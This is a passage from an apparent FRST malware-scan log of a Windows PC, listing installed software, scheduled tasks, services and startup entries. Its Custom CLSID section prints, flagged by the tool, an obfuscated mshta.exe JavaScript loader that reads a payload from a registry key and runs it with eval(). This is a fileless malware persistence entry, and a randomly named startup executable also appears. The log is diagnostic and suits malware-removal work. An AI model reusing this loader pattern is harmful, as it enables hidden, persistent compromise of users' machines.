pyfa version 1.5.1 (Oceanus 1.0) (HKLM-x32\...\{3DA39096-C08D-49CD-90E0-1D177F32C8AA}_is1) (Version: 1.5.1 (Oceanus 1.0) - pyfa)
qBittorrent 3.3.7 (HKLM-x32\...\qBittorrent) (Version: 3.3.7 - The qBittorrent project)
R for Windows 3.2.2 (HKLM\...\R for Windows 3.2.2_is1) (Version: 3.2.2 - R Core Team)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 2.20.15.1104 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.67.1226.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6954 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Redout (HKLM-x32\...\Redout_is1) (Version:  - )
Resident Evil 6 (HKLM-x32\...\Resident Evil 6_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Resident Evil 7 Biohazard (HKLM-x32\...\{1ECBF8F3-7079-44CA-AD32-B2AECBCF636F}_is1) (Version:  - Capcom)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.0.6.1 - Rockstar Games)
RStudio (HKLM-x32\...\RStudio) (Version: 1.0.136 - RStudio)
RUSH Mechanical Keyboard (HKLM-x32\...\{A852EA21-FD88-4840-AE94-3243C9895325}}_is1) (Version:  - )
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.25.0 - SAMSUNG Electronics Co., Ltd.)
Satellite Reign (HKLM-x32\...\1428054996_is1) (Version: 2.7.0.11 - GOG.com)
ScummVM 1.8.1 (HKLM-x32\...\ScummVM_is1) (Version:  - The ScummVM Team)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version:  - Microsoft)
Shadow Tactics - Blades of the Shogun (HKLM-x32\...\1601442230_is1) (Version: 2.0.0.3 - GOG.com)
Shift Happens version 1.0 (HKLM-x32\...\Shift Happens_is1) (Version: 1.0 - Klonk Games Deck13 FFF Bayern)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{BD90BC1C-115D-47E1-B85C-07AE182C3AB8}) (Version: 7.0.27.13 - Mad Catz)
Soldat 1.6.8 (HKLM-x32\...\Soldat_is1) (Version: 1.6.8 - Michal Marcinkowski)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.6.46 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Stronghold Crusader Extreme HD (HKLM-x32\...\GOGPACKSTRONGHOLDCRUSADERHD_is1) (Version: 2.2.0.8 - GOG.com)
StrongholdCrusader (HKLM\...\{5a56ddf5-f2fd-4a53-b852-909002f9df30}.sdb) (Version:  - )
SumatraPDF (HKLM-x32\...\SumatraPDF) (Version: 2.4 - Krzysztof Kowalczyk)
Sunless Sea (HKLM-x32\...\1421064427_is1) (Version: 2.4.0.5 - GOG.com)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.36244 - TeamViewer)
The Battle for Middle-earth ™ II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version:  - )
The Guild 2 - Pirates of the European Seas (HKLM-x32\...\GOGPACKTHEGUILD2PIRATES_is1) (Version: 2.0.0.4 - GOG.com)
The Guild 2 - Renaissance (HKLM-x32\...\1207664873_is1) (Version: 2.0.0.1 - GOG.com)
The Last Door -  Collector's Edition (HKLM-x32\...\GOGPACKTHELASTDOOR_is1) (Version: 2.0.0.3 - GOG.com)
The Red Alert (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\The Red Alert) (Version: 1.2.0.0 - CNC Labs)
The Settlers 3 - Ultimate Collection (HKLM-x32\...\GOGPACKSETTLERS3_is1) (Version: 2.0.0.19 - GOG.com)
The Talos Principle (HKLM-x32\...\The Talos Principle_is1) (Version:  - )
The Walking Dead: Michonne (HKLM-x32\...\The Walking Dead: Michonne_is1) (Version:  - )
The Witness (HKLM\...\dGhld2l0bmVzcw_is1) (Version: 1 - )
The Wolf Among Us (HKLM-x32\...\The Wolf Among Us_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Tom Clancy's Rainbow Six Vegas 2 (HKLM-x32\...\{FD416706-875C-4B0B-A23A-9E740DAE029E}) (Version: 1.03 - Ubisoft)
Torchlight 2 Rapid Respec (HKLM-x32\...\Torchlight 2 Rapid Respec) (Version: 2.04 - Chthon)
Torchlight II © Runic Games version 1 (HKLM-x32\...\Torchlight II © Runic Games_is1) (Version: 1 - )
ToxTrac (HKLM-x32\...\{3149DAFE-23F5-4907-BC83-9C4AA1661BD9}) (Version: 2.60 - Umeå University)
tpsDig2w64 version 2.19 (HKLM\...\tpsDig2w64_is1) (Version: 2.19 - )
Tribes Ascend (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF010}) (Version: 1.1.2860.0 - Hi-Rez Studios)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.8.4 - Tunngle.net GmbH)
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Unity Web Player (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unravel™ (HKLM-x32\...\{5105E605-9EE7-4050-9CC0-005093BBF89A}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Unreal Tournament GOTY (HKLM-x32\...\GOGPACKUT_is1) (Version: 2.0.0.5 - GOG.com)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 25.0 - Ubisoft)
Walking Dead 2 (HKLM-x32\...\Walking Dead 2_is1) (Version:  - Audioslave)
VASSAL (3.2.15) (HKLM\...\VASSAL (3.2.15)) (Version: 3.2.15 - vassalengine.org)
Who's Your Daddy Alpha version 0.1.1 (HKLM-x32\...\{1BE05F6C-F9EB-491B-AE8A-A4B77F60DF4D}_is1) (Version: 0.1.1 - Joe Williams)
Vikings: Wolves of Midgard (HKLM-x32\...\Vikings: Wolves of Midgard_is1) (Version:  - )
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
WinDirStat 1.1.2 (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\WinDirStat) (Version:  - )
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
Virtual Audio Cable 4.13 (HKLM\...\Virtual Audio Cable 4.13) (Version:  - )
Vivaldi (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Vivaldi) (Version: 1.13.1008.40 - Vivaldi)
VoiceAttack (HKLM-x32\...\{FBABC026-02F7-46D5-A0F9-3D355D3C3133}) (Version: 1.5.7 - VoiceAttack.com)
Wolfenstein The Old Blood (HKLM-x32\...\Wolfenstein The Old Blood_is1) (Version:  - )
Wolfenstein: The New Order (HKLM-x32\...\V29sZmVuc3RlaW5UaGVOZXdPcmRlcg==_is1) (Version: 1 - )
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
ZTE Handset USB Driver (HKLM\...\{01D42BF0-ED08-463f-8A28-99EB6FEE962B}) (Version:  - ZTE Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

HKU\.DEFAULT\Software\Classes\3d878: "C:\Windows\system32\mshta.exe" "javascript:Qy2pqhd8="cGnOVdL4";bu1=new ActiveXObject("WScript.Shell");s7Wb7IoYn="JcVXE";HAb4P=bu1.RegRead("HKCU\\software\\dovquskjdo\\thbfcp");Z9MeKir="h8c665I";eval(HAb4P);d0jSmzjo4="b4pkxh7";" <==== ATTENTION
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2014-05-12] ()
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-02-23] (NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0BBD42E9-A2FA-4576-9890-D0C1FED0E844} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2018-01-10] (NVIDIA Corporation)
Task: {0BFE3D12-EE22-42E2-9D99-08E5014A0294} - System32\Tasks\ASUS\i-Setup225905 => C:\Windows\Intel-Chipset_Win7_8_VER9401017\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.)
Task: {0FEC692B-1674-436D-BBF8-596CCFF7468D} - System32\Tasks\{8D7BD5CC-F762-4C88-83D1-6E0E6114373E} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.7.0.103/nl/abandoninstall?page=tsPlugin
Task: {2816C76A-9AA6-4188-ACEB-4BE0C0DD0E90} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {2EE04458-0CAB-4DFB-ABB0-601043DBF441} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-01-10] (NVIDIA Corporation)
Task: {3091ED5C-5B9D-4A68-A3AC-9A27E05EA3A8} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2018-01-10] (NVIDIA Corporation)
Task: {3C201A85-C7D6-4A1C-AC4B-352926B536E5} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2018-01-10] (NVIDIA Corporation)
Task: {57D3EFB8-7DC5-4C47-933B-B64DA7804C52} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {586E3E7E-04DD-4F50-BB9C-C8E54BFFCD13} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-02-06] (Adobe Systems Incorporated)
Task: {5ACD0E5E-1851-4D78-A828-E885A7A38D97} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {79DFCC47-8C8D-4D07-8F11-E20BECC26092} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd)
Task: {95D233E6-C06E-4569-BE35-EE1FF61B18E7} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {AFE18389-F758-4DAC-8D9B-E3B57C98E691} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {C37FC464-71FD-406A-9BB1-351B799E500C} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => C:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {D7E118E8-48A4-4305-9518-2E81878767D6} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {DF64ABAB-F7B0-43E8-9B1E-22A47ED36357} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {F25664B5-F21D-4C23-B584-2947A5D13292} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {FC3DA8B1-316E-4796-A3FC-79A33A78BC4C} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2017-02-01] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2013-11-11 17:27 - 2013-11-11 17:27 - 000066872 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2013-11-11 17:27 - 2013-11-11 17:27 - 000107832 _____ () C:\Windows\SysWOW64\PnkBstrB.exe
2017-07-17 18:30 - 2017-07-17 18:30 - 000863744 _____ () C:\Windows\mod_frst.exe

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\europacasino.com -> www.europacasino.com
IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\skype.com -> hxxps://apps.skype.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2014-12-06 18:54 - 2014-12-06 18:54 - 000000000 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Martin\AppData\Roaming\DisplayFusion\Wallpaper_1
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
bfe => Firewall Service is not running.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AeLookupSvc => 3
MSCONFIG\Services: ALG => 3
MSCONFIG\Services: AppIDSvc => 3
MSCONFIG\Services: AppMgmt => 3
MSCONFIG\Services: aspnet_state => 3
MSCONFIG\Services: AudioEndpointBuilder => 2
MSCONFIG\Services: AudioSrv => 2
MSCONFIG\Services: AxInstSV => 3
MSCONFIG\Services: BDESVC => 3
MSCONFIG\Services: BEService => 3
MSCONFIG\Services: BFE => 2
MSCONFIG\Services: BITS => 2
MSCONFIG\Services: Browser => 3
MSCONFIG\Services: bthserv => 3
MSCONFIG\Services: CertPropSvc => 3
MSCONFIG\Services: clr_optimization_v4.0.30319_32 => 2
MSCONFIG\Services: clr_optimization_v4.0.30319_64 => 2
MSCONFIG\Services: COMSysApp => 3
MSCONFIG\Services: CryptSvc => 3
MSCONFIG\Services: CscService => 2
MSCONFIG\Services: defragsvc => 3
MSCONFIG\Services: Dhcp => 2
MSCONFIG\Services: DiagTrack => 2
MSCONFIG\Services: DisplayFusionService => 2
MSCONFIG\Services: Dnscache => 2
MSCONFIG\Services: dot3svc => 3
MSCONFIG\Services: DPS => 2
MSCONFIG\Services: EapHost => 3
MSCONFIG\Services: EFS => 3
MSCONFIG\Services: eventlog => 2
MSCONFIG\Services: EventSystem => 2
MSCONFIG\Services: Fax => 3
MSCONFIG\Services: fdPHost => 3
MSCONFIG\Services: FDResPub => 3
MSCONFIG\Services: FlexNet Licensing Service => 3
MSCONFIG\Services: FontCache => 2
MSCONFIG\Services: FontCache3.0.0.0 => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Hamachi2Svc => 2
MSCONFIG\Services: hidserv => 3
MSCONFIG\Services: HiPatchService => 2
MSCONFIG\Services: hkmsvc => 3
MSCONFIG\Services: HnGSteamService => 3
MSCONFIG\Services: HomeGroupListener => 3
MSCONFIG\Services: HomeGroupProvider => 3
MSCONFIG\Services: idsvc => 3
MSCONFIG\Services: IEEtwCollectorService => 3
MSCONFIG\Services: IKEEXT => 2
MSCONFIG\Services: IPBusEnum => 3
MSCONFIG\Services: iphlpsvc => 2
MSCONFIG\Services: KeyIso => 3
MSCONFIG\Services: KtmRm => 3
MSCONFIG\Services: LanmanServer => 2
MSCONFIG\Services: LanmanWorkstation => 2
MSCONFIG\Services: lltdsvc => 3
MSCONFIG\Services: lmhosts => 2
MSCONFIG\Services: MMCSS => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: MpsSvc => 2
MSCONFIG\Services: MSDTC => 3
MSCONFIG\Services: MSiSCSI => 3
MSCONFIG\Services: msiserver => 3
MSCONFIG\Services: napagent => 3
MSCONFIG\Services: Netlogon => 3
MSCONFIG\Services: Netman => 3
MSCONFIG\Services: netprofm => 3
MSCONFIG\Services: NlaSvc => 2
MSCONFIG\Services: nsi => 2
MSCONFIG\Services: NvContainerLocalSystem => 2
MSCONFIG\Services: NvContainerNetworkService => 3
MSCONFIG\Services: NVDisplay.ContainerLocalSystem => 2
MSCONFIG\Services: NvTelemetryContainer => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: ose64 => 3
MSCONFIG\Services: osppsvc => 3
MSCONFIG\Services: p2pimsvc => 3
MSCONFIG\Services: p2psvc => 3
MSCONFIG\Services: PcaSvc => 2
MSCONFIG\Services: PeerDistSvc => 3
MSCONFIG\Services: PerfHost => 3
MSCONFIG\Services: pla => 3
MSCONFIG\Services: PNRPAutoReg => 3
MSCONFIG\Services: PNRPsvc => 3
MSCONFIG\Services: PolicyAgent => 3
MSCONFIG\Services: Power => 2
MSCONFIG\Services: ProtectedStorage => 3
MSCONFIG\Services: QWAVE => 3
MSCONFIG\Services: RasAuto => 3
MSCONFIG\Services: RasMan => 3
MSCONFIG\Services: Razer Game Scanner Service => 2
MSCONFIG\Services: RemoteRegistry => 3
MSCONFIG\Services: RpcLocator => 3
MSCONFIG\Services: SamSs => 2
MSCONFIG\Services: SCardSvr => 3
MSCONFIG\Services: SCPolicySvc => 3
MSCONFIG\Services: SDRSVC => 3
MSCONFIG\Services: SDScannerService => 2
MSCONFIG\Services: SDUpdateService => 2
MSCONFIG\Services: SDWSCService => 2
MSCONFIG\Services: seclogon => 3
MSCONFIG\Services: SENS => 2
MSCONFIG\Services: SensrSvc => 3
MSCONFIG\Services: SessionEnv => 3
MSCONFIG\Services: ShellHWDetection => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SNMPTRAP => 3
MSCONFIG\Services: Spooler => 2
MSCONFIG\Services: sppuinotify => 3
MSCONFIG\Services: SSDPSRV => 3
MSCONFIG\Services: SstpSvc => 3
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: stisvc => 2
MSCONFIG\Services: swprv => 3
MSCONFIG\Services: SysMain => 3
MSCONFIG\Services: TabletInputService => 3
MSCONFIG\Services: TapiSrv => 3
MSCONFIG\Services: TBS => 3
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TermService => 3
MSCONFIG\Services: Themes => 2
MSCONFIG\Services: THREADORDER => 3
MSCONFIG\Services: TrkWks => 2
MSCONFIG\Services: TrustedInstaller => 3
MSCONFIG\Services: TunngleService => 3
MSCONFIG\Services: UI0Detect => 3
MSCONFIG\Services: UmRdpService => 3
MSCONFIG\Services: upnphost => 3
MSCONFIG\Services: UxSms => 2
MSCONFIG\Services: VaultSvc => 3
MSCONFIG\Services: vds => 3
MSCONFIG\Services: VSS => 3
MSCONFIG\Services: W32Time => 3
MSCONFIG\Services: WatAdminSvc => 3
MSCONFIG\Services: wbengine => 3
MSCONFIG\Services: WbioSrvc => 3
MSCONFIG\Services: wcncsvc => 3
MSCONFIG\Services: WcsPlugInService => 3
MSCONFIG\Services: WdiServiceHost => 3
MSCONFIG\Services: WdiSystemHost => 3
MSCONFIG\Services: WebClient => 3
MSCONFIG\Services: Wecsvc => 3
MSCONFIG\Services: wercplsupport => 3
MSCONFIG\Services: WerSvc => 3
MSCONFIG\Services: WinDefend => 3
MSCONFIG\Services: WinHttpAutoProxySvc => 3
MSCONFIG\Services: Winmgmt => 2
MSCONFIG\Services: WinRM => 3
MSCONFIG\Services: Wlansvc => 3
MSCONFIG\Services: wlidsvc => 2
MSCONFIG\Services: wmiApSrv => 3
MSCONFIG\Services: WPCSvc => 3
MSCONFIG\Services: WPDBusEnum => 3
MSCONFIG\Services: WsAppService => 2
MSCONFIG\Services: wscsvc => 2
MSCONFIG\Services: WSearch => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\Services: wudfsvc => 2
MSCONFIG\Services: WwanSvc => 3
MSCONFIG\startupreg: Actual Multiple Monitors => "C:\Program Files (x86)\Actual Multiple Monitors\ActualMultipleMonitorsCenter.exe"
MSCONFIG\startupreg: AudioSwitcher => "C:\Users\Martin\AppData\Local\Temp\Rar$EXa0.926\AudioSwitcher.exe"
MSCONFIG\startupreg: CloneCDTray => "C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe" /s
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: DisplayFusion => "C:\Program Files (x86)\DisplayFusion\DisplayFusion.exe"
MSCONFIG\startupreg: EVEMon => "C:\Program Files (x86)\EVEMon\EVEMon.exe" -startMinimized
MSCONFIG\startupreg: f.lux => "C:\Users\Martin\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
MSCONFIG\startupreg: HP ENVY 4520 series (NET) => "C:\Program Files\HP\HP ENVY 4520 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH5BO3M1CC0660:NW" -scfn "HP ENVY 4520 series (NET)" -AutoStart 1
MSCONFIG\startupreg: MSC => "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
MSCONFIG\startupreg: ProfilerU => C:\Program Files\SmartTechnology\Software\ProfilerU.exe
MSCONFIG\startupreg: Razer Synapse => "C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe"
MSCONFIG\startupreg: RTHDVCPL => "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
MSCONFIG\startupreg: RUSH => C:\Program Files (x86)\Fnatic Gear\RUSH\RUSH_Core.exe
MSCONFIG\startupreg: SaiMfd => C:\Program Files\SmartTechnology\Software\SaiMfd.exe
MSCONFIG\startupreg: Salus => C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe
MSCONFIG\startupreg: SDTray => "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
MSCONFIG\startupreg: SpybotPostWindows10UpgradeReInstall => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\steam.exe" -silent
MSCONFIG\startupreg: USB3MON => "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
MSCONFIG\startupreg: Vivaldi Update Notifier => "C:\Program Files\Vivaldi\Application\update_notifier.exe"
MSCONFIG\startupreg: XboxStat => "C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe" silentrun

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{BCC7BE45-5ACA-4815-B066-515800CB6B4B}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
